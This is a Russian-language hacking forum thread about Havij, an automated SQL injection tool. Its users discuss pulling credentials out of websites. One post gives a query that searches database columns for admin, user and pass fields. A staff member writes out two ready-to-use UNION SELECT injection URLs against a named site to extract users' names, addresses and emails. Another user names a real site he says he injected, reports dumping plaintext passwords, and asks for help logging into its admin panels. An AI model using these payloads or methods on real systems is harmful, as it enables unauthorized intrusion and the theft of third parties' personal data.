Havij

Discussion in 'Болталка' started by White Bear, 10 Apr 2011.

  1. alextrust

    alextrust Member

    Joined:
    29 Mar 2010
    Messages:
    134
    Likes Received:
    27
    Reputations:
    11
    поставь виртуалку с ХР и запускай
     
  2. martmm

    martmm New Member

    Joined:
    29 Jan 2010
    Messages:
    80
    Likes Received:
    4
    Reputations:
    4
    Подскажите плиз есть такой софт по поиску sql в котором можно задавать слова для поиска названия таблиц, столбцов и т.д. Например осуществлять поиск по таким словам: admin, user, pass и выводить мне результаты. А то заколебывает искать пароли!((((
    Ps Надеюсь внятно объяснил?))))
     
  3. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    select concat_ws(0x2e, table_schema, table_name, column_name) from information_schema.columns where column_name like '%admin%' or column_name like '%user%' or column_name like '%pass%'
     
    _________________________
    2 people like this.
  4. martmm

    martmm New Member

    Joined:
    29 Jan 2010
    Messages:
    80
    Likes Received:
    4
    Reputations:
    4
    toxaэто вы про Хави говорите? Ок попробую!
     
  5. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,412
    Likes Received:
    904
    Reputations:
    863
    Это он говорит про запрос к БД которую можно реализовать через скуль!
     
    _________________________
    1 person likes this.
  6. _SG_

    _SG_ New Member

    Joined:
    1 Jul 2011
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    народ, такой вопрос, вытащил из хавиджи снифером скулю вида
    и не могу ее подогнать под rsaUnDumper[sql] 2.0, помогите, замаялся уже))
     
  7. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    919
    Reputations:
    862
    2 варианта твоей скули в нормальной интерпретации

    Code:
    http://www.sait.co.uk/news_full.php?id=9999'+/*!union+all+select+(select+concat(id,0x5e,name,0x5e,address,0x5e,postcode,0x5e,email)+from+`trakkerp_trakker`.users+limit+1,1),2,3,4,5,6,7,8,9,10,11,12,13,14*/+and+'x'='x
    Code:
    http://www.sait.co.uk/news_full.php?id=9999'/**//*!union/**/all/**/select/**/(select/**/concat(id,0x5e,name,0x5e,address,0x5e,postcode,0x5e,email)/**/from/**/`trakkerp_trakker`.users/**/limit/**/1,1),2,3,4,5,6,7,8,9,10,11,12,13,14*//**/and/**/'x'='x
    Теперь понагляднее
     
    _________________________
  8. vasykas

    vasykas Banned

    Joined:
    7 Mar 2011
    Messages:
    963
    Likes Received:
    137
    Reputations:
    37
    я думаю тебе сюда
    http://forum.antichat.ru/forum37.html
     
  9. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    919
    Reputations:
    862
    Недавно решал эту проблему. Успешно.

    Для страждущих:

    Заходим в свойства exe и ставим "Запускать в режиме совместимости с Windows XP SP2 или SP3"

    Далее - полёт нормальный.
     
    _________________________
  10. eksin

    eksin Elder - Старейшина

    Joined:
    26 Sep 2011
    Messages:
    64
    Likes Received:
    30
    Reputations:
    39
    где-то на форуме писали уже, что можно просто напротив Keyword поставить галку и в текст кейворд вписать 0000 (4 нуля), и ошибки больше не будет... мну помогло...
     
    1 person likes this.
  11. Lazy

    Lazy New Member

    Joined:
    19 Jul 2011
    Messages:
    94
    Likes Received:
    2
    Reputations:
    3
    Кто запускал havij через сокс ? (Или все на впн'ах ?)
    Я ему вбиваю адрес в setting->proxy . Он отвечает not a valid http proxy :\
    Т е он может работать только через http proxy ?
     
  12. tmp

    tmp Banned

    Joined:
    10 Mar 2005
    Messages:
    417
    Likes Received:
    32
    Reputations:
    1
    хм... выложенная здесь последняя версия 1.15 не может автоматом определить keyword в PostgreSQL, руками подставляю - запросы select version() выдает, таблицы и БД выдало, а вот дальше - не может прочесть колонки. 1.14 - определяет автоматом keyword но после -
    -------
    DB Server: PostgreSQL
    Target Vulnerable :D
    Finding current data base
    Please register to activate!
    --------------------
    Ни когда раньше с PostgreSQL не работал. Но ситуация странная. ща поищу больше инфы))) Версия походу стремная (1.15)
     
  13. hahanovB

    hahanovB Active Member

    Joined:
    22 Jul 2013
    Messages:
    264
    Likes Received:
    244
    Reputations:
    2
    Зравствуйте вообщем нашел я SQL иньекцию http://www.toydorks.com/displayproduct.php?item=125587
    дальше вставил ее в havij нашла имена, пароли, (не хэшированные сразу выдала нужные) дальше запустил программку admin finder нашло 3 админ панели вставил имя пароль во все админ панели пароль ни к одной не подошел??.. В чем проблема пожалуйста помогите! повторите все действия может быть тогда поймете в чем проблема... рад любому совету..
     
  14. InDuStRieS

    InDuStRieS Banned

    Joined:
    15 Mar 2009
    Messages:
    526
    Likes Received:
    253
    Reputations:
    32
    не та админ панель
    не пользуйся софтом
     
  15. hahanovB

    hahanovB Active Member

    Joined:
    22 Jul 2013
    Messages:
    264
    Likes Received:
    244
    Reputations:
    2
    А можете тогда посмотреть?? Буду благодарен.
     
  16. InDuStRieS

    InDuStRieS Banned

    Joined:
    15 Mar 2009
    Messages:
    526
    Likes Received:
    253
    Reputations:
    32
    Посмотреть может гинеколог
     
  17. hahanovB

    hahanovB Active Member

    Joined:
    22 Jul 2013
    Messages:
    264
    Likes Received:
    244
    Reputations:
    2
    Смешно... но мне не до шуток давно мучаюсь... пожалуйста помогите... взгляните...
     
  18. InDuStRieS

    InDuStRieS Banned

    Joined:
    15 Mar 2009
    Messages:
    526
    Likes Received:
    253
    Reputations:
    32
    а кто-то шутит?ты куда попал?нам это надо?
    ЭТО твои проблемы и решай сам
    Мы тебе ничем не обязаны
     
  19. hahanovB

    hahanovB Active Member

    Joined:
    22 Jul 2013
    Messages:
    264
    Likes Received:
    244
    Reputations:
    2
    Ага вот я и ищу добрых людей...
     
  20. Енерджайзер

    Joined:
    15 Oct 2012
    Messages:
    0
    Likes Received:
    4
    Reputations:
    0
    Без 0,5 не разобраться. :confused: